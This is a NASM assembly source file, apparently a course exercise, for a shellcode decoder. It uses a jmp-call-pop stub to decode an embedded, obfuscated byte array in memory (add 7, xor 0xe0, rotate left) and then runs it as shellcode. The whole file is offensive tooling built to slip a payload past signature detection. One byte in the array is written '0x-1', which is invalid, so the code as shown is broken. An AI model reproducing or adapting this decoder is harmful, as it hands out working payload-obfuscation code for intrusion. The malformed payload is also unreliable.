; Filename: decoder.nasm
; Author:  Ricardo Ruiz
; Website:  https://ricardojruiz.herokuapp.com/

global _start			
section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xe0 ; marker1
	jz short EncodedShellcode
	;;; Encoding ;;;
	mov bl,byte [esi+eax+1]
	add bl, 7
	xor bl,0xe0
	rol bl, 1
	;;; /Encoding ;;;
	mov byte [edi],bl
	inc edi
	add al, 2
	jmp short decode	

call_shellcode:
	call decoder
	EncodedShellcode: db 0x71,0x09,0x79,0x01,0xc1,0x04,0xcd,0x07,0x70,0x06,0x70,0x08,0x52,0x07,0xcd,0x01,0xcd,0x09,0x70,0x04,0xca,0x06,0x4d,0x03,0xd0,0x01,0x1d,0x0a,0x0a,0x01,0xc1,0x07,0x1d,0x04,0x8a,0x08,0x42,0x03,0x1d,0x02,0x09,0x02,0xb1,0x07,0x5e,0x01,0x-1,0x04,0x99,0x06,0xe0,0xe0 ; marker2